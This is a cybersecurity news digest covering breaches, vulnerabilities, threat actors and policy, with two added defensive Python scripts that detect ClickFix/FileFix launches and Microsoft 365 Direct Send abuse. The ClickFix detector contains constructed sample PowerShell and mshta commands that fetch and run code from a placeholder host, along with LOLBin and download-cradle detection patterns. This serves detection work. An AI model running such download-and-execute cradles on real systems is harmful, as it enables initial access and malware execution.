Major Incidents or Breaches

  • United Natural Foods Inc. (UNFI), a major supplier to Whole Foods, has restored its core systems and electronic ordering/invoicing platforms after a cyberattack. Details of the attack vector or threat actor have not been disclosed.
  • Hawaiian Airlines reported a cyberattack that disrupted access to some systems. Flight operations were not affected. The investigation is ongoing.
  • The U.S. Department of Justice charged a British national, alleged to be the threat actor “IntelBroker,” in connection with several high-profile breaches.
  • New South Wales Police arrested a former Western Sydney University student accused of repeatedly hacking university systems for personal gain, including manipulating parking and accessing data.
  • A Kansas City man pleaded guilty to hacking multiple organizations to promote his own cybersecurity services.
  • AT&T has agreed to a $177 million settlement following a data breach that resulted in customer information being leaked and sold on the dark web.
  • The “Cyber Fattah” hacktivist group leaked data from Saudi Games, amid increased hacktivist activity linked to regional tensions.

Newly Discovered Vulnerabilities

  • Researchers disclosed a critical vulnerability in the Open VSX Registry (“open-vsx[.]org”), the open-source extension marketplace used by VS Code forks. The flaw sat in the registry’s automated publishing workflow, which could expose a privileged publishing token to code in arbitrary extensions; an attacker holding that token could take control of the registry and push malicious extension updates to millions of developers. It has been fixed on the registry side, so the remaining practitioner action is to review which extensions are installed from this source and from where.
  • Cisco released updates to address two maximum-severity (CVSS 10.0) unauthenticated remote code execution vulnerabilities in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). A remote, unauthenticated attacker could execute arbitrary commands as root on the underlying operating system. Cisco lists no workarounds, so patching is the only fix.
  • CISA reported active exploitation of a maximum-severity (CVSS 10.0) vulnerability in AMI MegaRAC Baseboard Management Controller (BMC) firmware that lets an attacker who can reach the BMC’s management interface bypass authentication, hijack the server, and potentially brick it. BMC interfaces should sit on an isolated management network, never on a routable or internet-facing segment; patches come from each server vendor, not from AMI directly.
  • A bug affecting 689 Brother printer models (and 53 models from other manufacturers including Fujifilm, Toshiba, Ricoh, and Konica Minolta) lets an attacker generate the device’s default administrator password remotely, because it is derived from the serial number and the serial number can be obtained over the network. Devices already manufactured cannot be fully fixed in firmware, so changing the default administrator password is the required mitigation.

Notable Threat Actor Activity

  • Iranian state-sponsored group APT35 (Charming Kitten, linked to the IRGC) is conducting spear-phishing campaigns targeting Israeli journalists, cybersecurity experts, and tech professionals, using AI-assisted phishing techniques to produce more convincing lures.
  • Cybercriminals are using open-source and publicly available tooling to target financial institutions across Africa in a campaign ongoing since at least July 2023.
  • Scattered Spider, a well-known threat actor, has shifted its targeting from global retailers to U.S.-based insurance firms. Its TTPs are unchanged: social engineering of help desks and MFA bypass to hijack identities, so identity-verification procedures for password and MFA resets are the control to review.
  • Researchers observed a significant increase (517%) in ClickFix social engineering attacks, in which a fake CAPTCHA or error page instructs the user to paste a clipboard command into the Windows Run dialog, as an initial access vector. A related method, FileFix, has emerged: the same command is pasted into the File Explorer address bar instead, which evades controls that only watch the Run dialog.
  • Ongoing phishing campaigns are abusing Microsoft 365’s “Direct Send” feature, which lets devices and applications deliver mail to a tenant’s MX endpoint without authenticating, to deliver phishing emails that appear to come from internal users and bypass the controls applied to external mail.
  • Bitdefender reported a surge in social engineering attacks targeting WhatsApp users, aiming to compromise accounts through various scam tactics.
  • New Trojan malware is targeting sensitive information stored in mobile device screenshots, including cryptocurrency wallet seed phrases.
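Both ClickFix and FileFix end with explorer.exe spawning a script interpreter that reaches out to the internet, which is what a process-creation detection can key on. The following is an added example (not code from the original digest or from any vendor) that runs a heuristic over constructed Sysmon-style events; the sample IPs, paths, and the “fake path after `#`” FileFix indicator are assumptions for illustration.

```python
"""Heuristic detection of ClickFix / FileFix launches in process-creation telemetry.

ClickFix: a fake CAPTCHA or error page tells the user to press Win+R and paste a
command, so explorer.exe spawns an interpreter (powershell, mshta, ...) with a
download cradle. FileFix: the same command is pasted into the File Explorer
address bar, typically with a trailing "# C:\\fake\\path" so the box still looks
like a file path. Both leave explorer.exe as the parent of the interpreter.
Events below are constructed Sysmon-style records (assumed field names), not
real telemetry.
"""
import ntpath
import re

SAMPLE_EVENTS = [
    # ClickFix: pasted into Win+R, hidden window, download cradle (constructed)
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://203.0.113.10/captcha.txt -UseBasicParsing)"'},
    # ClickFix variant using mshta to fetch a remote HTA (constructed)
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.10/verify.hta"},
    # FileFix: pasted into the Explorer address bar with a fake path comment (constructed)
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Start-Process mshta http://203.0.113.10/x" # C:\company\Q2_report.pdf'},
    # Benign: admin runs a local script from a terminal (constructed)
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Benign: user opens notepad from the Run dialog (constructed)
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Interpreters and LOLBins commonly launched by ClickFix lures.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line indicators; at least one must hit before we raise a verdict.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b|\bmshta\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}
# Assumed FileFix marker: a "#" comment followed by a drive-letter path.
FAKE_PATH_COMMENT = re.compile(r"\s#\s*[A-Za-z]:\\")


def classify_event(event):
    """Return 'clickfix', 'filefix' or None for one process-creation event."""
    if ntpath.basename(event["ParentImage"]).lower() != "explorer.exe":
        return None
    if ntpath.basename(event["Image"]).lower() not in INTERPRETERS:
        return None
    cmd = event["CommandLine"]
    hits = [name for name, pat in INDICATORS.items() if pat.search(cmd)]
    if not hits:
        return None
    return "filefix" if FAKE_PATH_COMMENT.search(cmd) else "clickfix"


def scan_events(events):
    """Run classify_event over a list of events and return the findings."""
    findings = []
    for i, ev in enumerate(events):
        verdict = classify_event(ev)
        if verdict:
            findings.append({"index": i, "verdict": verdict,
                             "image": ntpath.basename(ev["Image"]),
                             "command": ev["CommandLine"]})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['verdict']}] event {f['index']}: {f['image']} :: {f['command']}")
```

Explorer.exe as parent alone is too noisy (every Run-dialog launch has it), so the verdict requires a cradle, hidden window, encoded command or URL on top of it. For after-the-fact forensics, the Run dialog history at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU often still holds the pasted ClickFix command.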

Trends, Tools, or Tactics of Interest

  • Use of open-source and commodity tools by cybercriminals for targeting financial institutions is increasing, particularly in Africa; detection has to rest on behaviour rather than on tool signatures.
  • Fake CAPTCHA (ClickFix) and File Explorer address-bar (FileFix) social engineering tactics are on the rise as initial access methods; both rely on the user pasting and running a clipboard command.
  • Abuse of Microsoft 365’s “Direct Send” feature is being used to bypass detection and deliver phishing that appears internal.
  • AI-assisted phishing is being adopted by state-sponsored actors, as seen in APT35’s recent campaigns.
  • SaaS adoption continues to outpace the development of effective data resilience and security controls, increasing organizational risk.
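The Direct Send abuse described above leaves a recognisable header pattern: an internal From: domain, a connecting IP that is not one of the organization’s own senders, and no passing SPF or DKIM, all recorded by the tenant’s own MX endpoint. The following is an added example (not code from the original digest or from Microsoft) that checks raw message headers for that pattern; the domain, IP addresses, and headers are constructed for illustration.

```python
"""Flag inbound mail that looks like Microsoft 365 Direct Send abuse.

Direct Send lets a device or application hand mail to the tenant's MX endpoint
(<tenant>.mail.protection.outlook.com) without authenticating. Abuse looks like
an internal From: domain, a connecting IP that is not a known sender for the
organization, and neither SPF nor DKIM passing. All sample data is constructed.
"""
import email
import re
from email.utils import parseaddr

INTERNAL_DOMAINS = {"contoso.com"}       # assumed accepted domains of the tenant
AUTHORIZED_IPS = {"198.51.100.7"}        # assumed on-prem scanner/relay that legitimately uses Direct Send

# Constructed: spoofed helpdesk mail delivered straight to the tenant MX from an unknown host.
SUSPECT_RAW = """\
Received: from mail-relay.example.net (203.0.113.25) by
 contoso-com.mail.protection.outlook.com (10.1.1.5) with Microsoft SMTP Server
 id 15.20.7000.0; Wed, 25 Jun 2025 09:12:44 +0000
Authentication-Results: spf=fail (sender IP is 203.0.113.25)
 smtp.mailfrom=contoso.com; dkim=none (message not signed) header.d=none;
 dmarc=fail action=oreject header.from=contoso.com;compauth=fail reason=000
From: IT Helpdesk <helpdesk@contoso.com>
To: alice@contoso.com
Subject: Voicemail notification

You have a new voicemail. Open the attached link to listen.
"""

# Constructed: a real multifunction printer on an authorized IP that is also listed in SPF.
BENIGN_RAW = """\
Received: from scanner01.contoso.com (198.51.100.7) by
 contoso-com.mail.protection.outlook.com (10.1.1.5) with Microsoft SMTP Server
 id 15.20.7000.0; Wed, 25 Jun 2025 09:20:10 +0000
Authentication-Results: spf=pass (sender IP is 198.51.100.7)
 smtp.mailfrom=contoso.com; dkim=none (message not signed) header.d=none;
 dmarc=pass action=none header.from=contoso.com;compauth=pass reason=100
From: Scanner <scanner@contoso.com>
To: alice@contoso.com
Subject: Scanned document

Your scan is attached.
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def _unfold(value):
    """Collapse a folded header into a single line."""
    return " ".join(value.split()) if value else ""


def _auth_result(auth_results, method):
    """Pull e.g. 'pass'/'fail'/'none' for spf= or dkim= out of Authentication-Results."""
    m = re.search(r"\b%s=(\w+)" % method, auth_results, re.I)
    return m.group(1).lower() if m else "none"


def _source_ip(msg):
    """IP of the host that connected to the tenant MX endpoint (the hop EXO itself recorded)."""
    for received in msg.get_all("Received", []):
        before_by, sep, after_by = _unfold(received).partition(" by ")
        if sep and "mail.protection.outlook.com" in after_by:
            m = IPV4.search(before_by)
            if m:
                return m.group(1)
    return None


def direct_send_findings(raw_message, internal_domains=INTERNAL_DOMAINS, authorized_ips=AUTHORIZED_IPS):
    """Return a dict describing whether the message matches the Direct Send abuse pattern."""
    msg = email.message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    auth = _unfold(msg.get("Authentication-Results", ""))
    spf, dkim = _auth_result(auth, "spf"), _auth_result(auth, "dkim")
    source_ip = _source_ip(msg)

    reasons = []
    if from_domain in internal_domains:
        reasons.append("From: claims internal domain %s" % from_domain)
    if source_ip not in authorized_ips:
        reasons.append("connecting IP %s is not an authorized sender" % source_ip)
    if spf != "pass" and dkim != "pass":
        reasons.append("no passing SPF (%s) or DKIM (%s)" % (spf, dkim))

    return {"suspect": len(reasons) == 3, "from_domain": from_domain,
            "source_ip": source_ip, "spf": spf, "dkim": dkim, "reasons": reasons}


if __name__ == "__main__":
    for label, raw in (("suspect", SUSPECT_RAW), ("benign", BENIGN_RAW)):
        r = direct_send_findings(raw)
        print(label, "->", "SUSPECT" if r["suspect"] else "ok", "; ".join(r["reasons"]))
```

The allow-list is the part that needs care: printers, scanners and line-of-business apps that legitimately use Direct Send must either be on it and in the SPF record, or be moved to authenticated SMTP submission or an inbound connector. Once that inventory is done, the tenant-level fix is Exchange Online’s Reject Direct Send setting (`Set-OrganizationConfig -RejectDirectSend $true`), which refuses unauthenticated mail claiming an internal sender at the MX endpoint rather than relying on a mail-flow rule to catch it afterwards.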

Regulatory or Policy Developments

  • The U.S. Federal Trade Commission (FTC) approved $126 million in refunds to Fortnite users as part of a settlement over the use of “dark patterns” by Epic Games to induce unwanted purchases.
  • Microsoft has rolled out changes to the Windows security architecture aimed at preventing outages like the 2024 CrowdStrike incident, including a platform that lets endpoint security products run outside the kernel and a Quick Machine Recovery capability for remotely repairing machines that fail to boot.
  • AT&T’s $177 million settlement over a major data breach establishes compensation for affected users whose personal data was leaked.